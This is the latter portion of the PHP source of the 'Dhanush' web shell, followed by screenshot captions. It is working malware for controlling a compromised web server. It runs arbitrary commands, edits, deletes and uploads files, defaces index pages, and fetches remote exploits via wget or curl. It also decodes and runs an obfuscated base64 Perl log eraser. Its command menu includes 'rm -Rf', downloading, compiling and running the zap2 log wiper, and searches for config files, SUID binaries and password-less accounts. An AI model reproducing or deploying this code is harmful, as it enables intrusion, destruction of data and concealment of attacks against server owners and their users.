5041                     <td>To </td><td> : </td><td><input value="<?php echo $_GET['rename'];?>" name="to" class="box" /></td>
5042                     </tr>
5043                     </table>
5044                     <br>
5045                     <input type="Submit" value="Rename It" class="but" style="margin-left: 160px;padding: 5px;"/>
5046                     </form>
5047                     <?php
5048                     
5049                     }
5050                     else if(isset($_GET['open']))
5051                     {
5052                     ?>
5053                     <form method="POST" action="<?php echo $self;?>"\>
5054                     <table>
5055                     <tr>
5056                     <td>File </td><td> : </td><td><input value="<?php echo $_GET['open'];?>" class="box" name="file" /></td>
5057                     </tr>
5058                     <tr>
5059                     <td>Size </td><td> : </td><td><input value="<?php echo filesize($_GET['open']);?>" class="box" /></td>
5060                     </tr>
5061                     </table>
5062                     <textarea name="content" rows="20" cols="100" class="box"><?php
5063                     $content = htmlspecialchars(file_get_contents($_GET['open']));
5064                     if($content)
5065                     {
5066                     echo $content;
5067                     }
5068                     else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
5069                     {
5070                     fopen($_GET['open']);
5071                     while(!feof())
5072                     {
5073                     echo htmlspecialchars(fgets($_GET['open']));
5074                     }
5075                     }
5076                     
5077                     ?>
5078                     </textarea><br />
5079                     <input name="save" type="Submit" value="Save Changes" id="spacing" class="but"/>
5080                     </form>
5081                     <?php
5082                     }
5083                     
5084                     else if(isset($_POST['file']) &&
5085                     isset($_POST['content']) )
5086                     {
5087                     if(is_dir($_POST['file']))
5088                     {
5089                     header("location:".$self."?dir=".$_POST['file']);
5090                     }
5091                     if(file_exists($_POST['file']))
5092                     {
5093                     $handle = fopen($_POST['file'],"w");
5094                     fwrite($handle,$_POST['content']);
5095                     header("Location:$self");
5096                     }
5097                     else
5098                     {
5099                     echo "<p class='alert'>File Name Specified does not exists!</p>";
5100                     }
5101                     }
5102                     
5103                     else if(isset($_GET['selfkill']))
5104                     {
5105                     unlink(__FILE__);
5106                     echo "<br><center><font class=txt size=5>Good Bye......</font></center>";
5107                     }
5108                     
5109                     else if(isset($_POST['executecmd']))
5110                     {
5111                     if($_POST['mycmd']=="logeraser")
5112                     {
5113                     $erase = gzinflate(base64_decode("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"));
5114                     if(is_writable("."))
5115                     {
5116                     if($openp = fopen(getcwd()."/logseraser.pl", 'w'))
5117                     {
5118                     fwrite($openp, $erase);
5119                     fclose($openp);
5120                     passthru("perl logseraser.pl linux");
5121                     unlink("logseraser.pl");
5122                     echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
5123                     }
5124                     } else
5125                     {
5126                     if($openp = fopen("/tmp/logseraser.pl", 'w'))
5127                     {
5128                     fwrite($openp, $erase)or die("Error");
5129                     fclose($openp);
5130                     $aidx = passthru("perl logseraser.pl linux");
5131                     unlink("logseraser.pl");
5132                     echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
5133                     }
5134                     }
5135                     }
5136                     else
5137                     {
5138                     $check = shell_exec($_POST['mycmd']);
5139                     echo "<center><textarea cols=120 rows=20 class=box>" . $check . "</textarea></center>";
5140                     }
5141                     }
5142                     
5143                     else if(isset($_POST['changefileperms']))
5144                     {
5145                     if($_POST['chmode'] != null && is_numeric($_POST['chmode']))
5146                     {
5147                     $actbox = $_POST["actbox3"];
5148                     foreach ($actbox as $v)
5149                     {
5150                     $perms = 0;
5151                     for($i=strlen($_POST['chmode'])-1;$i>=0;--$i)
5152                     $perms += (int)$_POST['chmode'][$i]*pow(8, (strlen($_POST['chmode'])-$i-1));
5153                     echo "<center><div align=left style=width:60%;>";
5154                     if(@chmod($v,$perms))
5155                     echo "<blink><font size=3>File $v Permissions Changed Successfully</font></blink>";
5156                     else
5157                     echo "<blink><font size=3 class=txt>Cannot Change $v File Permissions</font></blink>";
5158                     echo "</div></center>";
5159                     }
5160                     
5161                     }
5162                     }
5163                     else if(isset($_POST['choice']))
5164                     {
5165                     if($_POST['choice'] == "chmod")
5166                     { ?>
5167                     <form method="POST" ><?php
5168                     $actbox1 = $_POST['actbox'];
5169                     foreach ($actbox1 as $v)
5170                     { ?>
5171                     <input type="hidden" name="actbox3[]" value="<?php echo $v; ?>">
5172                     <?php }
5173                     ?>
5174                     <table align="center" border="1" style="width:40%;">
5175                     <tr>
5176                     <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
5177                     </tr>
5178                     <tr>
5179                     <td colspan="2" align="center" style="height:60px">
5180                     <input type="Submit" value="Change Permission" class="but" style="padding: 5px;" name="changefileperms"/></td>
5181                     </tr>
5182                     </table>
5183                     
5184                     </form>  <?php
5185                     }
5186                     else if($_POST['choice'] == "delete")
5187                     {
5188                     $actbox = $_POST["actbox"];
5189                     
5190                     foreach ($actbox as $v)
5191                     {
5192                     if(is_file($v))
5193                     {
5194                     if(unlink($v))
5195                     {
5196                     echo "<br><center><font class=txt size=3>File $v Deleted Successfully</font></center>";
5197                     }
5198                     else
5199                     echo "<br><center><font size=3>Cannot Delete File $v</font></center>";
5200                     }
5201                     else if(is_dir($v))
5202                     {
5203                     rrmdir($v);
5204                     $loc = $_SERVER['REQUEST_URI'];
5205                     header("Location:$loc");
5206                     ob_end_flush();
5207                     }
5208                     }
5209                     }
5210                     else if($_POST['choice'] == "compre")
5211                     {
5212                     $actbox = $_POST["actbox"];
5213                     foreach ($actbox as $v)
5214                     {
5215                     if(is_file($v))
5216                     {
5217                     $zip = new ZipArchive();
5218                     $filename= basename($v) . '.zip';
5219                     if(($zip->open($filename, ZipArchive::CREATE))!==true)
5220                     { echo '<br><font size=3>Error: Unable to create zip file for $v</font>';}
5221                     else {echo "<br><font class=txt size=3>File $v Compressed successfully</font>";}
5222                     $zip->addFile(basename($v));
5223                     $zip->close();
5224                     }
5225                     else if(is_dir($v))
5226                     {
5227                     if($os == "Linux")
5228                     {
5229                     $filename= basename($v);
5230                     execmd("tar --create --recursion --file=$filename.tar $v");
5231                     echo "<br><font class=txt size=3>File $v Compressed successfully as $v.tar</font>";
5232                     }
5233                     }
5234                     }
5235                     }
5236                     else if($_POST['choice'] == "uncompre")
5237                     {
5238                     $actbox = $_POST["actbox"];
5239                     foreach ($actbox as $v)
5240                     {
5241                     $zip = new ZipArchive;
5242                     $filename= basename($v);
5243                     $res = $zip->open($filename);
5244                     if ($res === TRUE)
5245                     {
5246                     $pieces = explode(".",$filename);
5247                     $zip->extractTo($pieces[0]);
5248                     $zip->close();
5249                     echo "<br><font class=txt size=3>File $v Unzipped successfully</font>";
5250                     } else {
5251                     echo "<br><font size=3>Error: Unable to Unzip file $v</font>";
5252                     }
5253                     }
5254                     }
5255                     }
5256                     
5257                     else if(isset($_POST['execute']))
5258                     {
5259                     $comm = $_POST['execute'];
5260                     
5261                     
5262                     chdir($_POST['executepath']);
5263                     $check = shell_exec($comm);
5264                     
5265                     echo "<center><textarea cols=120 rows=20 class=box>" . $check . "</textarea></center>";
5266                     
5267                     ?>
5268                     <BR><BR><center><form action="<?php $self; ?>" method="post">
5269                     <input type="hidden" name="executepath" value="<?php echo $_POST['executepath']; ?>" />
5270                     <input type="text" class="box" name="execute">
5271                     <input type="submit" value="Execute" class="but"></form></center>
5272                     <?php
5273                     }
5274                     
5275                     else if(isset($_POST['Create']))
5276                     {
5277                     ?>
5278                     <form method="post">
5279                     
5280                     <input type="hidden" name="filecreator" value="<?php echo $_POST['createfile']; ?>">
5281                     <textarea name="filecontent" rows="20" cols="100" class="box"></textarea><br />
5282                     <input name="createmyfile" type="Submit" value="  Save " id="spacing" class="but"/>
5283                     </form>
5284                     
5285                     <?php }
5286                     
5287                     else
5288                     {
5289                     
5290                     $mydir = basename(dirname(__FILE__));
5291                     $pdir = str_replace($mydir,"",$dir);
5292                     $pdir = str_replace("/","",$dir);
5293                     
5294                     $files = array();
5295                     $dirs  = array();
5296                     
5297                     $odir=opendir($dir);
5298                     while($file = readdir($odir))
5299                     {
5300                     if(is_dir($dir.'/'.$file))
5301                     {
5302                     $dirs[]=$file;
5303                     }
5304                     else
5305                     {
5306                     $files[]=$file;
5307                     }
5308                     }
5309                     $countfiles = count($dirs) + count($files);
5310                     $dircount = count($dirs);
5311                     $dircount = $dircount-2;
5312                     ?>
5313                     <table style="width:95%;" align="center" cellpadding="0">
5314                     <tr class="file"><td colspan="7" align="center"><font class="txt">Listing folder <?php echo $dir; ?></font> (<?php echo $dircount.' Dirs And '.count($files).' Files'; ?>)</td>
5315                     <tr class="file">
5316                     <th style="width:53%;">Name</th>
5317                     <th style="width:7%;">Size</th>
5318                     <th style="width:9%;">Permissions</th>
5319                     <?php if($os != "Windows"){ echo "<th style=\"width:9%;\">Owner / Group</th>"; } ?>
5320                     <th style="width:12%;">Modification Date</th>
5321                     <th style="width:6%;">Rename</th>
5322                     <th style="width:7%;">Download</th>
5323                     <th style="width:3%;">Action</th>
5324                     </tr>
5325                     
5326                     <?php
5327                     
5328                     if(isset($_GET['download']))
5329                     {
5330                     download();
5331                     }
5332                     ?>
5333                     <form method="post" id="myform" name="myform">
5334                     <?php
5335                     $dir = getcwd();
5336                     if(isset($_GET['dir']))
5337                     {
5338                     $dir = $_GET['dir'];
5339                     }
5340                     $i = 0;
5341                     if(is_dir($dir))
5342                     {
5343                     if($countfiles == 2)
5344                     echo "<tr><td colspan=5><center><font size=3>No files or directory present or Cannot view files and directory</font></center></td></tr>";
5345                     
5346                     foreach($dirs as $val)
5347                     {
5348                     ?>
5349                     <font color="#999999">
5350                     <?php if($val == ".")
5351                     {
5352                     ?><tr class="file"><td class='info'><a href='<?php echo $self; ?>'>[ . ]</a></td><td>CURDIR</td>
5353                     <td><?php if(is_writable(getcwd())) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo getcwd(); ?>"><font class="wrtperm"><?php echo getFilePermissions(getcwd());?></font></a><?php } else if(is_readable(getcwd())) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo getcwd(); ?>"><font class="readperm"><?php echo getFilePermissions(getcwd());?></font></a><?php } else { ?><a href="<?php echo $self; ?>?perms&file=<?php echo getcwd(); ?>"><font class="noperm"><?php echo getFilePermissions(getcwd());?></font><?php } ?></td>
5354                     <?php if($os != 'Windows')
5355                     {
5356                     echo "<td>";
5357                     $name=@posix_getpwuid(@fileowner($self));
5358                     $group=@posix_getgrgid(@filegroup($self));
5359                     $owner = $name['name']. " / ". $group['name'];
5360                     echo $owner . "</td>";
5361                     }
5362                     ?>
5363                     <td><font size="2" class="txt"><?php echo date('Y-m-d H:i:s', @filemtime(getcwd())); ?></font></td>
5364                     <td></td><td></td><td></td></</tr><?php
5365                     
5366                     }else if($val=="..") { $val = Trail($dir . $directorysperator . $val,$directorysperator); ?>
5367                     <tr  class="file"><td class='info'><a href='<?php echo $self . "?dir=".$val; ?>'>[ .. ]</a></td><td>UPDIR</td>
5368                     
5369                     <td><?php if(is_writable($val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $val; ?>"><font class="wrtperm"><?php echo getFilePermissions($val);?></font></a><?php } else if(is_readable($val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $val; ?>"><font  class="readperm"><?php echo getFilePermissions($val);?></font></a><?php } else { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $val; ?>"><font  class="noperm"><?php echo getFilePermissions($val);?></font><?php } ?></td>
5370                     <?php    if($os != 'Windows')
5371                     {
5372                     echo "<td>";
5373                     $name=@posix_getpwuid(@fileowner($val));
5374                     $group=@posix_getgrgid(@filegroup($val));
5375                     $owner = $name['name']. " / ". $group['name'];
5376                     echo $owner . "</td>";
5377                     }  ?>
5378                     <td><font size="2" class="txt"><?php echo date('Y-m-d H:i:s', @filemtime($val)); ?></font></td>
5379                     <td></td><td></td><td></td></tr><?php continue; }
5380                     }
5381                     foreach($dirs as $val)
5382                     {
5383                     $i++;
5384                     ?>
5385                     <font color="#999999">
5386                     
5387                     <?php if($val == "." || $val == "..") continue; ?>
5388                     <tr  class="file">
5389                     <td class='dir'><a href='<?php echo $self ?>?dir=<?php echo $dir . $directorysperator . $val; ?>'>[ <?php echo $val; ?> ]</a></td>
5390                     <td class='info'>DIR</td>
5391                     <td class='info'><?php if(is_writable($dir . $directorysperator . $val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font class="wrtperm"><?php echo getFilePermissions($dir . $directorysperator . $val);?></font></a><?php } else if(is_readable($dir . $directorysperator . $val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font  class="readperm"><?php echo getFilePermissions($dir . $directorysperator . $val);?></font></a><?php } else { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font class="noperm"><?php echo getFilePermissions($dir . $directorysperator . $val);?></font><?php } ?></td>
5392                     <?php if($os != 'Windows')
5393                     {
5394                     echo "<td>";
5395                     $name=@posix_getpwuid(@fileowner($val));
5396                     $group=@posix_getgrgid(@filegroup($val));
5397                     $owner = $name['name']. " / ". $group['name'];
5398                     echo $owner . "</td>";
5399                     }  ?>
5400                     <td><font size="2" class="txt"><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
5401                     <td class="info"><a href="<?php echo $self;?>?getdir=<?php echo $dir; ?>&rename=<?php echo $dir . $directorysperator . $val;?>">Rename</a></td>
5402                     <td></td>
5403                     <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
5404                     </tr></font>
5405                     <?php
5406                     }
5407                     foreach($files as $val)
5408                     {
5409                     $i++;
5410                     ?>
5411                     <tr class="file">
5412                     <td class='file'><a href='<?php echo $self ?>?open=<?php echo $dir . $directorysperator . $val; ?>'><?php if(("/" .$val == $_SERVER["SCRIPT_NAME"]) || ($val == "index.php") || ($val == "index.html") || ($val == "config.php") || ($val == "wp-config.php")) { echo "<font color=#F4FA58>". $val . "</font>";  } else { echo $val; } ?></a> <?php if($val == "index.php" || $val == "index.html") { if(strlen($ind) != 0) { echo "<a href='?deface=" . $dir . $directorysperator . $val . "'><font color=#F4FA58>( Deface IT )</font></a>"; } } ?></td>
5413                     <td class='info'><?php echo HumanReadableFilesize(filesize($dir . $directorysperator . $val));?></td>
5414                     
5415                     <td class='info'><?php if(is_writable($dir . $directorysperator . $val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font class="wrtperm"><?php echo getFilePermissions($dir . $directorysperator . $val);?></font></a><?php } else if(is_readable($dir . $directorysperator . $val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font  class="readperm"><?php echo getFilePermissions($dir . $directorysperator . $val);?></font></a><?php } else { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font class="noperm"><?php echo getFilePermissions($dir . $directorysperator . $val);?></font><?php } ?></td>
5416                     <?php if($os != 'Windows')
5417                     {
5418                     echo "<td>";
5419                     $name=@posix_getpwuid(@fileowner($val));
5420                     $group=@posix_getgrgid(@filegroup($val));
5421                     $owner = $name['name']. " / ". $group['name'];
5422                     echo $owner . "</td>";
5423                     }  ?>
5424                     <td><font size="2" class="txt"><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
5425                     <td class="info"><a href="<?php echo $self;?>?getdir=<?php echo $dir; ?>&rename=<?php echo $dir . $directorysperator . $val;?>">Rename</a></td>
5426                     <td class="info"><a href="<?php echo $self;?>?download=<?php echo $dir . $directorysperator .$val;?>">Download</a>
5427                     <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
5428                     </tr>
5429                     <p>
5430                     <?php
5431                     }
5432                     }
5433                     else
5434                     {
5435                     echo "<p><font size=4>".$_GET['dir']." is <b>NOT</b> a Valid Directory!<br /></font></p>";
5436                     }
5437                     
5438                     echo "</table>
5439                     <div align='right' style='width:97%;'><BR><input type='checkbox' name='checkall' onclick='checkedAll();'> <font class=txt>Check All </font> &nbsp;
5440                     <select class=sbox name=choice style='width: 100px;'>
5441                     <option value=delete>Delete</option>
5442                     <option value=chmod>Change mode</option>
5443                     if(class_exists('ZipArchive'))
5444                     { <option value=compre>Compress</option>
5445                     <option value=uncompre>Uncompress</option> }
5446                     </select>
5447                     
5448                     <input type=submit value=Submit name=checkoption class=but></form></div>";
5449                     }
5450                     
5451                     ?>
5452                     </p>
5453                     <table style="width:100%;" border="1">
5454                     <tr>
5455                     <td align="center">
5456                     <form method="post" enctype="multipart/form-data">
5457                     
5458                     Upload file : <br><input class="upld" type="file" name="uploadfile" class="box" size="50"><input type="hidden" name="path" value="<?php echo $dir; ?>" />&nbsp;<input type=submit value="Upload" name="u" value="u" class="but" ></form>
5459                     <?php
5460                     
5461                     if (is_writable($dir)) {
5462                     echo '<font class=wrtperm>< writable ></font>';
5463                     } else {
5464                     echo '< not writable >';
5465                     }
5466                     ?>
5467                     <br>
5468                     
5469                     
5470                     
5471                     </td>
5472                     <td align="center" style="height:105px;">Create File :
5473                     <form method="post">
5474                     <input type="text" class="box" value="<?php echo $dir . $directorysperator; ?>" name="createfile"> <input type="submit" value="Create" name="Create" class="but">
5475                     </form>
5476                     <?php
5477                     
5478                     if (is_writable($dir)) {
5479                     echo '<font class=wrtperm>< writable ></font>';
5480                     } else {
5481                     echo '< not writable >';
5482                     }
5483                     ?>
5484                     </td>
5485                     </tr>
5486                     <tr>
5487                     <td align="center" style="height:105px;">Execute : <form action="<?php echo $self; ?>" method="post">
5488                     <input type="hidden" name="executepath" value="<?php echo $dir; ?>" />
5489                     <input type="text" class="box" name="execute"> <input type="submit" value="Execute" class="but"></form></td>
5490                     
5491                     <td align="center">Create Directory : <form method="post">
5492                     <input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="createfolder">
5493                     <input type="submit" value="Create" name="createdir" class="but">
5494                     </form><?php
5495                     
5496                     if (is_writable($dir)) {
5497                     echo '<font class=wrtperm>< writable ></font>';
5498                     } else {
5499                     echo '< not writable >';
5500                     }
5501                     ?></td></tr>
5502                     <tr><td style="height:105px;" align="center">Get Exploit&nbsp;<form method="post" actions="<?php echo $self; ?>">
5503                     <input type="text" name="wurl" class="box" value="http://www.some-code/exploits.c"> <input type="submit" name="uploadurl" value="  G0  " class="but"><br><br>
5504                     <input type="hidden" name="path" value="<?php echo $dir; ?>">
5505                     <select name="functiontype" class="sbox">
5506                     <option value="wwget">wget</option>
5507                     <option value="wlynx">lynx</option>
5508                     <option value="wfread">fread</option>
5509                     <option value="wfetch">fetch</option>
5510                     <option value="wlinks">links</option>
5511                     <option value="wget">GET</option>
5512                     <option value="wcurl">curl</option>
5513                     </select>
5514                     </form>
5515                     </td>
5516                     <td align="center">
5517                     <form method="post" action="<?php echo $self; ?>">
5518                     Some Commands<br>
5519                     <?php if($os != "Windows")
5520                     { ?>
5521                     <SELECT NAME="mycmd" class="box">
5522                     <OPTION VALUE="uname -a">Kernel version
5523                     <OPTION VALUE="w">Logged in users
5524                     <OPTION VALUE="lastlog">Last to connect
5525                     <option value='cat /etc/hosts'>IP Addresses
5526                     <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP
5527                     <OPTION VALUE="logeraser">Log Eraser
5528                     <OPTION VALUE="find / -perm -2 -ls">Find all writable directories
5529                     <OPTION VALUE="find . -perm -2 -ls">Find all writable directories in Current Folder
5530                     <OPTION VALUE="find / -type f -name \"config*\"">find config* files
5531                     <OPTION VALUE="find . -type f -name \"config*\"">find config* files in current dir
5532                     <OPTION VALUE="find . -type f -perm -04000 -ls">find suid files in current dir
5533                     <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
5534                     <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
5535                     <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
5536                     <?php if(is_dir('/etc/valiases')){ ?><option value="ls -l /etc/valiases">List of Cpanel`s domains(valiases)</option><?php } ?>
5537                     <?php if(is_dir('/etc/vdomainaliases')) { ?><option value=\"ls -l /etc/vdomainaliases">List Cpanel`s domains(vdomainaliases)</option><?php } ?>
5538                     <OPTION VALUE="which wget curl w3m lynx">Downloaders?
5539                     <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
5540                     <OPTION VALUE="ps aux">Show running proccess
5541                     <OPTION VALUE="uptime">Uptime check
5542                     <OPTION VALUE="cat /proc/meminfo">Memory check
5543                     <OPTION VALUE="netstat -an | grep -i listen">Open ports
5544                     <OPTION VALUE="rm -Rf">Format box (DANGEROUS)
5545                     <OPTION VALUE="wget www.ussrback.com/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)
5546                     <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
5547                     <OPTION VALUE="./zap2">WIPELOGS PT3
5548                     <OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
5549                     </SELECT>
5550                     <?php } else {?>
5551                     <SELECT NAME="mycmd" class="box">
5552                     <OPTION VALUE="dir /s /w /b *config*.php">Find *config*.php in current directory
5553                     <OPTION VALUE="dir /s /w /b index.php">Find index.php in current dir
5554                     <OPTION VALUE="systeminfo">System Informations
5555                     <OPTION VALUE="net user">User accounts
5556                     <OPTION VALUE="netstat -an">Open ports
5557                     <OPTION VALUE="getmac">Get Mac Address
5558                     <OPTION VALUE="net start">Show running services
5559                     <OPTION VALUE="net view">Show computers
5560                     <OPTION VALUE="arp -a">ARP Table
5561                     <OPTION VALUE="tasklist">Show Process
5562                     <OPTION VALUE="ipconfig/all">IP Configuration
5563                     
5564                     </SELECT>
5565                     <?php } ?>
5566                     <input type="submit" value="Execute" class="but" name="executecmd">
5567                     </form>
5568                     </td>
5569                     </tr></table><br>
5570                     
5571                     </td>
5572                     </tr>
5573                     </table>
5574                     <?php
5575                     
5576                     
5577                     //logout
5578                     
5579                     if(isset($_GET['logout']))
5580                     {
5581                     setcookie("hacked",time() - 60*60);
5582                     header("Location:$self");
5583                     ob_end_flush();
5584                     }
5585                     ?>
5586                     
5587                     
5588                     <hr>
5589                     <div align="center">
5590                     <span class=headtitle><font size="6">&#2343;&#2344;&#2369;&#2359;</font></span><br><span class=headtitle><font size="6">--==Coded By Arjun==--</font></span><br>
5591                     <a href="http://www.google.com/search?q=%E0%A4%9C%E0%A4%AF%20%E0%A4%B9%E0%A4%BF%E0%A4%A8%E0%A5%8D%E0%A4%A6" target="_blank"><font  size="6">&#2332;&#2351; &#2361;&#2367;&#2344;&#2381;&#2342;</font></a></div>
5592                     <?php
5593                     }
5594                     if(isset($_POST['uname']) && isset($_POST['passwd']))
5595                     {
5596                     if( $_POST['uname'] == $user && $_POST['passwd'] == $pass )
5597                     {
5598                     setcookie("hacked", md5($pass));
5599                     $selfenter = $_SERVER["PHP_SELF"];
5600                     header("Location:$selfenter");
5601                     }
5602                     }
5603                     
5604                     if((!isset($_COOKIE['hacked']) || $_COOKIE['hacked']!=md5($pass)) )
5605                     {
5606                     
5607                     ?>
5608                     <center>
5609                     <form method="POST">
5610                     <div class="logindiv">
5611                     <table cellpadding="9" cellspacing="4">
5612                     <tr>
5613                     <td align="center" colspan="2"><blink><font class="headtitle" size="7"><b>Dhanush </b></font></blink></td>
5614                     </tr>
5615                     <tr>
5616                     <td align="right"><b>User Name : </b></td>
5617                     <td><input type="text" name="uname" class="sbox"  value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
5618                     </tr>
5619                     <tr>
5620                     <td align="right"><b>Password : </b></td>
5621                     <td><input type="password" name="passwd" class="sbox"  value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
5622                     </tr>
5623                     <tr>
5624                     <td align="center" colspan="2"><input type="submit" class="but" value="     Enter     "></td>
5625                     </tr>
5626                     <tr>
5627                     <td colspan="2"><font size="6" face="Times New Roman, Times, serif"><b>--==Coded By Arjun==--</b></font></td>
5628                     </tr>
5629                     </table>
5630                     </div>
5631                     
5632                     </form>
5633                     </center>
5634                     
5635                     </body>
5636                     </html>
5637                     <?php
5638                     }
5639                     ?>

Dhanush Shell screenshot

Dhanush shell screenshot

Dhanush shell screenshot